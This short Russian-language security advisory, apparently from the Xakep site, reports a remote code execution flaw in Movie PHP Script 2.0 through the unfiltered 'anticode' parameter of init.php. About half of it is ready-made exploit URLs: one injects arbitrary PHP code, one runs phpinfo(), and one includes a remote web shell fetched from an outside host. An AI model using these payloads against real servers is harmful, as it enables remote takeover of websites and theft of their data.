Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Программа: Movie PHP Script 2.0
Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре «anticode» сценарием init.php. Удаленный пользователь может
выполнить произвольные команды на целевой системе.
Эксплоит:
http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]
http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";
http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();